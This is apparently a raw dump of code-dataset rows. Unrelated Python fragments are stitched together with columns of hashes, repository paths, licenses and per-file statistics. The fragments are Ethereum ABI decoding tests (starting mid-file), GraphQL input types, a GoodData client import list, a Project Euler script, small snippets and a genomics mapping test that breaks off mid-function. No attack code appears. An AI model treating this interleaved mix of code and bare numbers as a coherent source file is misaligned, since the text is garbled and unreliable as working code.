(decode_hex('0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0000000000000000000000000000000000000000000000000000000000000001'), 1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'), -1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'), -100),
)
)
def test_int8_decoding(input, expected):
output = decode_single('int8', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000001'), 1),
(decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'), -1),
(decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'), -100),
)
)
def test_decode_int256(input, expected):
output = decode_single('int256', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0000000000000000000000000000000000000000000000000000000000000001'), 1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'), -1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'), -100),
)
)
def test_decode_accepts_bytes(input, expected):
output = decode_single('int256', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000001'), 1),
(
decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'),
2 ** 256 - 1,
),
(
decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'),
2 ** 256 -100,
),
)
)
def test_decode_uint256(input, expected):
output = decode_single('uint256', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000001'), True),
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000000'), False),
)
)
def test_decode_bool(input, expected):
output = decode_single('bool', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(
decode_hex('0x7465737400000000000000000000000000000000000000000000000000000000'),
b'test\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
),
(
decode_hex('0x6162636465666768696a6b6c6d6e6f707172737475767778797a000000000000'),
b'abcdefghijklmnopqrstuvwxyz\x00\x00\x00\x00\x00\x00',
),
(
decode_hex('0x3031323334353637383921402324255e262a2829000000000000000000000000'),
b'0123456789!@#$%^&*()\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
),
(
decode_hex('0x6162630000000000616263000000000000000000000000000000000000000000'),
b'abc\x00\x00\x00\x00\x00abc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
),
)
)
def test_decode_bytes32(input, expected):
output = decode_single('bytes32', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(
decode_hex('0x0000000000000000000000000000000000000000000000000000000000000000'),
'0x0000000000000000000000000000000000000000',
),
(
decode_hex('0x000000000000000000000000c305c901078781c232a2a521c2af7980f8385ee9'),
'0xc305c901078781c232a2a521c2af7980f8385ee9',
),
(
decode_hex('0x0000000000000000000000000005c901078781c232a2a521c2af7980f8385ee9'),
'0x0005c901078781c232a2a521c2af7980f8385ee9',
),
(
decode_hex('0x000000000000000000000000c305c901078781c232a2a521c2af7980f8385000'),
'0xc305c901078781c232a2a521c2af7980f8385000',
),
(
decode_hex('0x0000000000000000000000000005c901078781c232a2a521c2af7980f8385000'),
'0x0005c901078781c232a2a521c2af7980f8385000',
),
)
)
def test_decode_address(input, expected):
output = decode_single('address', input)
assert output == expected
| 35.947368
| 132
| 0.711933
| 373
| 5,464
| 10.265416
| 0.171582
| 0.103421
| 0.143379
| 0.175503
| 0.611648
| 0.571167
| 0.571167
| 0.571167
| 0.564116
| 0.564116
| 0
| 0.384183
| 0.185395
| 5,464
| 151
| 133
| 36.18543
| 0.476073
| 0
| 0
| 0.406015
| 0
| 0.022556
| 0.500549
| 0.471449
| 0
| 0
| 0.267936
| 0
| 0.06015
| 1
| 0.06015
| false
| 0
| 0.022556
| 0
| 0.082707
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f5f65c50585da913ebd3d7c75e880ec902195df0
| 391
|
py
|
Python
|
snoberry/schema/mutation/input_types.py
|
paul-sud/snoberry
|
94bd45b750f9fd7fd3be367a74623e9551f4f765
|
[
"MIT"
] | null | null | null |
snoberry/schema/mutation/input_types.py
|
paul-sud/snoberry
|
94bd45b750f9fd7fd3be367a74623e9551f4f765
|
[
"MIT"
] | null | null | null |
snoberry/schema/mutation/input_types.py
|
paul-sud/snoberry
|
94bd45b750f9fd7fd3be367a74623e9551f4f765
|
[
"MIT"
] | null | null | null |
from typing import List, Optional
import strawberry
from ...models import ChildModel, ParentModel
@strawberry.experimental.pydantic.input(model=ChildModel, fields=["name"])
class ChildInput:
pass
@strawberry.experimental.pydantic.input(model=ParentModel, fields=["name"])
class ParentInput:
children: Optional[List[ChildInput]] = None
child_ids: Optional[List[str]] = None
| 23
| 75
| 0.764706
| 44
| 391
| 6.772727
| 0.545455
| 0.147651
| 0.201342
| 0.234899
| 0.268456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120205
| 391
| 16
| 76
| 24.4375
| 0.866279
| 0
| 0
| 0
| 0
| 0
| 0.02046
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.1
| 0.3
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
f5fbae0aa3900c9f3c6d9db5f912e2880c7c0177
| 8,566
|
py
|
Python
|
gooddata-afm-client/gooddata_afm_client/models/__init__.py
|
hkad98/gooddata-python-sdk
|
64942080ecb44c2d8e914e57f7a591daa6cca205
|
[
"MIT"
] | null | null | null |
gooddata-afm-client/gooddata_afm_client/models/__init__.py
|
hkad98/gooddata-python-sdk
|
64942080ecb44c2d8e914e57f7a591daa6cca205
|
[
"MIT"
] | null | null | null |
gooddata-afm-client/gooddata_afm_client/models/__init__.py
|
hkad98/gooddata-python-sdk
|
64942080ecb44c2d8e914e57f7a591daa6cca205
|
[
"MIT"
] | null | null | null |
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from from gooddata_afm_client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from gooddata_afm_client.model.afm import AFM
from gooddata_afm_client.model.absolute_date_filter import AbsoluteDateFilter
from gooddata_afm_client.model.absolute_date_filter_absolute_date_filter import AbsoluteDateFilterAbsoluteDateFilter
from gooddata_afm_client.model.abstract_measure_value_filter import AbstractMeasureValueFilter
from gooddata_afm_client.model.afm_execution import AfmExecution
from gooddata_afm_client.model.afm_execution_response import AfmExecutionResponse
from gooddata_afm_client.model.afm_identifier import AfmIdentifier
from gooddata_afm_client.model.afm_local_identifier import AfmLocalIdentifier
from gooddata_afm_client.model.afm_object_identifier import AfmObjectIdentifier
from gooddata_afm_client.model.afm_object_identifier_attribute import AfmObjectIdentifierAttribute
from gooddata_afm_client.model.afm_object_identifier_attribute_identifier import AfmObjectIdentifierAttributeIdentifier
from gooddata_afm_client.model.afm_object_identifier_core import AfmObjectIdentifierCore
from gooddata_afm_client.model.afm_object_identifier_core_identifier import AfmObjectIdentifierCoreIdentifier
from gooddata_afm_client.model.afm_object_identifier_dataset import AfmObjectIdentifierDataset
from gooddata_afm_client.model.afm_object_identifier_dataset_identifier import AfmObjectIdentifierDatasetIdentifier
from gooddata_afm_client.model.afm_object_identifier_identifier import AfmObjectIdentifierIdentifier
from gooddata_afm_client.model.afm_object_identifier_label import AfmObjectIdentifierLabel
from gooddata_afm_client.model.afm_object_identifier_label_identifier import AfmObjectIdentifierLabelIdentifier
from gooddata_afm_client.model.afm_valid_objects_query import AfmValidObjectsQuery
from gooddata_afm_client.model.afm_valid_objects_response import AfmValidObjectsResponse
from gooddata_afm_client.model.arithmetic_measure_definition import ArithmeticMeasureDefinition
from gooddata_afm_client.model.arithmetic_measure_definition_arithmetic_measure import ArithmeticMeasureDefinitionArithmeticMeasure
from gooddata_afm_client.model.attribute_execution_result_header import AttributeExecutionResultHeader
from gooddata_afm_client.model.attribute_filter import AttributeFilter
from gooddata_afm_client.model.attribute_filter_elements import AttributeFilterElements
from gooddata_afm_client.model.attribute_header import AttributeHeader
from gooddata_afm_client.model.attribute_header_out import AttributeHeaderOut
from gooddata_afm_client.model.attribute_item import AttributeItem
from gooddata_afm_client.model.attribute_result_header import AttributeResultHeader
from gooddata_afm_client.model.comparison_measure_value_filter import ComparisonMeasureValueFilter
from gooddata_afm_client.model.comparison_measure_value_filter_comparison_measure_value_filter import ComparisonMeasureValueFilterComparisonMeasureValueFilter
from gooddata_afm_client.model.data_column_locator import DataColumnLocator
from gooddata_afm_client.model.data_column_locators import DataColumnLocators
from gooddata_afm_client.model.date_filter import DateFilter
from gooddata_afm_client.model.dimension import Dimension
from gooddata_afm_client.model.dimension_header import DimensionHeader
from gooddata_afm_client.model.element import Element
from gooddata_afm_client.model.elements_request import ElementsRequest
from gooddata_afm_client.model.elements_response import ElementsResponse
from gooddata_afm_client.model.execution_links import ExecutionLinks
from gooddata_afm_client.model.execution_response import ExecutionResponse
from gooddata_afm_client.model.execution_result import ExecutionResult
from gooddata_afm_client.model.execution_result_grand_total import ExecutionResultGrandTotal
from gooddata_afm_client.model.execution_result_header import ExecutionResultHeader
from gooddata_afm_client.model.execution_result_paging import ExecutionResultPaging
from gooddata_afm_client.model.execution_settings import ExecutionSettings
from gooddata_afm_client.model.filter_by import FilterBy
from gooddata_afm_client.model.filter_definition import FilterDefinition
from gooddata_afm_client.model.filter_definition_for_simple_measure import FilterDefinitionForSimpleMeasure
from gooddata_afm_client.model.header_group import HeaderGroup
from gooddata_afm_client.model.inline_filter_definition import InlineFilterDefinition
from gooddata_afm_client.model.inline_filter_definition_inline import InlineFilterDefinitionInline
from gooddata_afm_client.model.inline_measure_definition import InlineMeasureDefinition
from gooddata_afm_client.model.inline_measure_definition_inline import InlineMeasureDefinitionInline
from gooddata_afm_client.model.measure_definition import MeasureDefinition
from gooddata_afm_client.model.measure_execution_result_header import MeasureExecutionResultHeader
from gooddata_afm_client.model.measure_group_header import MeasureGroupHeader
from gooddata_afm_client.model.measure_header_out import MeasureHeaderOut
from gooddata_afm_client.model.measure_item import MeasureItem
from gooddata_afm_client.model.measure_result_header import MeasureResultHeader
from gooddata_afm_client.model.measure_value_filter import MeasureValueFilter
from gooddata_afm_client.model.negative_attribute_filter import NegativeAttributeFilter
from gooddata_afm_client.model.negative_attribute_filter_negative_attribute_filter import NegativeAttributeFilterNegativeAttributeFilter
from gooddata_afm_client.model.paging import Paging
from gooddata_afm_client.model.pop_dataset import PopDataset
from gooddata_afm_client.model.pop_dataset_measure_definition import PopDatasetMeasureDefinition
from gooddata_afm_client.model.pop_dataset_measure_definition_previous_period_measure import PopDatasetMeasureDefinitionPreviousPeriodMeasure
from gooddata_afm_client.model.pop_date import PopDate
from gooddata_afm_client.model.pop_date_measure_definition import PopDateMeasureDefinition
from gooddata_afm_client.model.pop_date_measure_definition_over_period_measure import PopDateMeasureDefinitionOverPeriodMeasure
from gooddata_afm_client.model.pop_measure_definition import PopMeasureDefinition
from gooddata_afm_client.model.positive_attribute_filter import PositiveAttributeFilter
from gooddata_afm_client.model.positive_attribute_filter_positive_attribute_filter import PositiveAttributeFilterPositiveAttributeFilter
from gooddata_afm_client.model.problem import Problem
from gooddata_afm_client.model.range_measure_value_filter import RangeMeasureValueFilter
from gooddata_afm_client.model.range_measure_value_filter_range_measure_value_filter import RangeMeasureValueFilterRangeMeasureValueFilter
from gooddata_afm_client.model.ranking_filter import RankingFilter
from gooddata_afm_client.model.ranking_filter_ranking_filter import RankingFilterRankingFilter
from gooddata_afm_client.model.relative_date_filter import RelativeDateFilter
from gooddata_afm_client.model.relative_date_filter_relative_date_filter import RelativeDateFilterRelativeDateFilter
from gooddata_afm_client.model.rest_api_identifier import RestApiIdentifier
from gooddata_afm_client.model.result_dimension import ResultDimension
from gooddata_afm_client.model.result_dimension_headers_inner import ResultDimensionHeadersInner
from gooddata_afm_client.model.result_spec import ResultSpec
from gooddata_afm_client.model.simple_measure_definition import SimpleMeasureDefinition
from gooddata_afm_client.model.simple_measure_definition_measure import SimpleMeasureDefinitionMeasure
from gooddata_afm_client.model.sort_key import SortKey
from gooddata_afm_client.model.sort_key_attribute import SortKeyAttribute
from gooddata_afm_client.model.sort_key_attribute_attribute import SortKeyAttributeAttribute
from gooddata_afm_client.model.sort_key_value import SortKeyValue
from gooddata_afm_client.model.sort_key_value_value import SortKeyValueValue
from gooddata_afm_client.model.status_type import StatusType
from gooddata_afm_client.model.total import Total
from gooddata_afm_client.model.total_dimension import TotalDimension
from gooddata_afm_client.model.total_execution_result_header import TotalExecutionResultHeader
from gooddata_afm_client.model.total_result_header import TotalResultHeader
| 79.314815
| 158
| 0.922601
| 1,049
| 8,566
| 7.140133
| 0.186845
| 0.155407
| 0.194259
| 0.271963
| 0.525768
| 0.484513
| 0.366622
| 0.256876
| 0.109746
| 0
| 0
| 0.000123
| 0.05265
| 8,566
| 107
| 159
| 80.056075
| 0.922859
| 0.042027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
eb0246a909748dd6551cdf27e2db84056ea8fe20
| 184
|
py
|
Python
|
Problem3.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
Problem3.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
Problem3.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
from smallestPrimeDivisor import smallestPrimeDivisor
from allPrimeFactors import allPrimeFactors
n = 600851475143
allPrimeDivisors = allPrimeFactors( n )
print allPrimeDivisors[-1]
| 23
| 53
| 0.853261
| 16
| 184
| 9.8125
| 0.5625
| 0.203822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079268
| 0.108696
| 184
| 8
| 54
| 23
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.4
| null | null | 0.2
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
eb0491082841a6b09a4fe544ca67206c9bdc4127
| 82
|
py
|
Python
|
HighSchool/Python/DoNow103/code.py
|
SomeAspy/SchoolRepos
|
57a45a8dfae19fda604d1a68f716f6b8da4fb614
|
[
"MIT"
] | null | null | null |
HighSchool/Python/DoNow103/code.py
|
SomeAspy/SchoolRepos
|
57a45a8dfae19fda604d1a68f716f6b8da4fb614
|
[
"MIT"
] | null | null | null |
HighSchool/Python/DoNow103/code.py
|
SomeAspy/SchoolRepos
|
57a45a8dfae19fda604d1a68f716f6b8da4fb614
|
[
"MIT"
] | null | null | null |
# Aiden Baker
# 2/12/2021
# DoNow103
print(2*3*5)
print("abc")
print("abc"+"bde")
| 11.714286
| 18
| 0.634146
| 15
| 82
| 3.466667
| 0.733333
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180556
| 0.121951
| 82
| 7
| 18
| 11.714286
| 0.541667
| 0.365854
| 0
| 0
| 0
| 0
| 0.183673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
eb213e1f74fd9706e3867cb258dd1c3180e7fdda
| 52
|
py
|
Python
|
test/examples/toplevel/one/.shovel/__init__.py
|
demiurgestudios/shovel
|
3db497164907d3765fae182959147d19064671c7
|
[
"MIT"
] | 202
|
2015-01-12T13:47:29.000Z
|
2022-02-09T19:13:36.000Z
|
test/examples/toplevel/one/.shovel/__init__.py
|
demiurgestudios/shovel
|
3db497164907d3765fae182959147d19064671c7
|
[
"MIT"
] | 14
|
2017-04-09T17:04:53.000Z
|
2021-05-16T11:08:34.000Z
|
test/examples/toplevel/one/.shovel/__init__.py
|
demiurgestudios/shovel
|
3db497164907d3765fae182959147d19064671c7
|
[
"MIT"
] | 22
|
2015-09-11T18:35:10.000Z
|
2021-05-16T11:04:56.000Z
|
from shovel import task
@task
def whiz():
pass
| 8.666667
| 23
| 0.673077
| 8
| 52
| 4.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 52
| 5
| 24
| 10.4
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
de48d29a59049fc4365ace77aa8d21bf46c65719
| 232
|
py
|
Python
|
gail_airl_ppo/network/__init__.py
|
caoxixiya/od_irl
|
cc5da49344174859b74ad67b9abe6d910b4159d0
|
[
"MIT"
] | null | null | null |
gail_airl_ppo/network/__init__.py
|
caoxixiya/od_irl
|
cc5da49344174859b74ad67b9abe6d910b4159d0
|
[
"MIT"
] | null | null | null |
gail_airl_ppo/network/__init__.py
|
caoxixiya/od_irl
|
cc5da49344174859b74ad67b9abe6d910b4159d0
|
[
"MIT"
] | 1
|
2021-09-06T02:58:09.000Z
|
2021-09-06T02:58:09.000Z
|
from .policy import StateDependentPolicy, StateIndependentPolicy
from .value import StateFunction, StateActionFunction, TwinnedStateActionFunction
from .disc import GAILDiscrim, AIRLDiscrim, ODIRLDiscrim
from .cla import DeltaReward
| 58
| 81
| 0.875
| 21
| 232
| 9.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086207
| 232
| 4
| 82
| 58
| 0.957547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
de494ea3ea796de58feeb80b61f3680dc4584e1a
| 57
|
py
|
Python
|
automatic/webhookbot.py
|
therealebraheem/Moon
|
20de5f36d98fa77df86752183feebb735ed98359
|
[
"Unlicense"
] | null | null | null |
automatic/webhookbot.py
|
therealebraheem/Moon
|
20de5f36d98fa77df86752183feebb735ed98359
|
[
"Unlicense"
] | null | null | null |
automatic/webhookbot.py
|
therealebraheem/Moon
|
20de5f36d98fa77df86752183feebb735ed98359
|
[
"Unlicense"
] | null | null | null |
# TODO: add webhook code to send codes in server channel
| 28.5
| 56
| 0.77193
| 10
| 57
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192982
| 57
| 1
| 57
| 57
| 0.956522
| 0.947368
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 1
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
de5d401133f332a4623682e7f251cedb7f6ec65a
| 72
|
py
|
Python
|
orange3/Orange/clustering/__init__.py
|
rgschmitz1/BioDepot-workflow-builder
|
f74d904eeaf91ec52ec9b703d9fb38e9064e5a66
|
[
"MIT"
] | 54
|
2017-01-08T17:21:49.000Z
|
2021-11-02T08:46:07.000Z
|
orange3/Orange/clustering/__init__.py
|
Synthia-3/BioDepot-workflow-builder
|
4ee93abe2d79465755e82a145af3b6a6e1e79fd4
|
[
"MIT"
] | 22
|
2017-03-28T06:03:14.000Z
|
2021-07-28T05:43:55.000Z
|
orange3/Orange/clustering/__init__.py
|
Synthia-3/BioDepot-workflow-builder
|
4ee93abe2d79465755e82a145af3b6a6e1e79fd4
|
[
"MIT"
] | 21
|
2017-01-26T21:12:09.000Z
|
2022-01-31T21:34:59.000Z
|
from .dbscan import *
from .hierarchical import *
from .kmeans import *
| 18
| 27
| 0.75
| 9
| 72
| 6
| 0.555556
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 72
| 3
| 28
| 24
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
de661a011eb9841b3a9fec560a12eff54997279a
| 508
|
py
|
Python
|
HeadBasedInteractionPy/runForDebug.py
|
muratcancicek/Head_Based_Interaction
|
40716d60d900251d2711c6b781627b1fe583e358
|
[
"Apache-2.0"
] | 5
|
2019-06-13T23:24:50.000Z
|
2021-01-08T10:57:05.000Z
|
HeadBasedInteractionPy/runForDebug.py
|
muratcancicek/Head_Based_Interaction
|
40716d60d900251d2711c6b781627b1fe583e358
|
[
"Apache-2.0"
] | 5
|
2019-06-24T16:38:37.000Z
|
2021-11-15T16:56:24.000Z
|
HeadBasedInteractionPy/runForDebug.py
|
muratcancicek/Head_Based_Interaction
|
40716d60d900251d2711c6b781627b1fe583e358
|
[
"Apache-2.0"
] | 1
|
2019-06-23T18:17:13.000Z
|
2019-06-23T18:17:13.000Z
|
# Author: Muratcan Cicek, https://users.soe.ucsc.edu/~cicekm/
from InteractionDemos.DemoBuilder import run
from InteractionDemos.InputEstimationDemo.InputEstDemoHandler import playInputEst
from InteractionDemos.MappingDemo.MappingDemoHandler import playMapping
from InteractionDemos.InputEstimationDemo.EstimationPlotter import plot
from paths import InputEstimatorsDemo_Folder
def main():
playMapping()
#run()
#playInputEst()
#plot()
if __name__ == '__main__':
main()
print('Done')
| 31.75
| 81
| 0.791339
| 49
| 508
| 8.020408
| 0.632653
| 0.203562
| 0.198473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122047
| 508
| 16
| 82
| 31.75
| 0.881166
| 0.165354
| 0
| 0
| 0
| 0
| 0.028571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| true
| 0
| 0.5
| 0
| 0.6
| 0.1
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
de7af71a163c2861589f71fc852f372ce19df23d
| 148
|
py
|
Python
|
pub/functions/forms.py
|
DASTUDIO/MyVHost
|
b9eda56a67c2df9236b7866087bc7f465542f951
|
[
"MIT"
] | 2
|
2021-07-27T10:38:57.000Z
|
2021-10-10T20:42:56.000Z
|
pub/functions/forms.py
|
DASTUDIO/MyVHost
|
b9eda56a67c2df9236b7866087bc7f465542f951
|
[
"MIT"
] | null | null | null |
pub/functions/forms.py
|
DASTUDIO/MyVHost
|
b9eda56a67c2df9236b7866087bc7f465542f951
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from django import forms as f
class reg(f.Form):
username = f.CharField()
password = f.CharField()
phone = f.CharField()
| 21.142857
| 29
| 0.662162
| 22
| 148
| 4.454545
| 0.727273
| 0.306122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.209459
| 148
| 7
| 30
| 21.142857
| 0.82906
| 0.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.2
| 0.2
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
deb03b01603c045427f8d594952d22a212b720eb
| 7,634
|
py
|
Python
|
tests/test_tb_full_mapping.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 2
|
2017-07-31T11:45:46.000Z
|
2017-08-09T09:32:35.000Z
|
tests/test_tb_full_mapping.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 28
|
2016-11-17T11:12:32.000Z
|
2018-11-02T14:09:13.000Z
|
tests/test_tb_full_mapping.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 4
|
2017-02-12T17:47:21.000Z
|
2018-05-29T08:16:27.000Z
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import gzip
import pytest
from basic_modules.metadata import Metadata
from tool.gem_indexer import gemIndexerTool
from tool.tb_full_mapping import tbFullMappingTool
def generate_gem():
"""
Create the GEM file
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
genome_fa = resource_path + "tb.Human.GCA_000001405.22.fasta"
genome_gem_fa = resource_path + "tb.Human.GCA_000001405.22_gem.fasta"
with gzip.open(genome_fa + '.gz', 'rb') as fgz_in:
with open(genome_fa, 'wb') as f_out:
f_out.write(fgz_in.read())
genome_gem_idx = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem.gz"
input_files = {
"genome": genome_fa
}
output_files = {
"index": genome_gem_idx,
"genome_gem": genome_gem_fa
}
metadata = {
"genome": Metadata(
"Assembly", "fasta", genome_fa, None,
{'assembly': 'test'}),
}
print(input_files, output_files)
gem_it = gemIndexerTool({"execution": resource_path})
gem_it.run(input_files, metadata, output_files)
@pytest.mark.hic
def test_tb_extract_fastq():
"""
Extract the compressed FASTQ files
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
fastq_file_1 = resource_path + "tb.Human.SRR1658573_1.fastq"
fastq_file_2 = resource_path + "tb.Human.SRR1658573_2.fastq"
gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
if not os.path.isfile(gem_file):
generate_gem()
with gzip.open(gem_file + '.gz', 'rb') as fgz_in:
with open(gem_file, 'w') as f_out:
f_out.write(fgz_in.read())
with gzip.open(fastq_file_1 + '.gz', 'rb') as fgz_in:
with open(fastq_file_1, 'w') as f_out:
f_out.write(fgz_in.read())
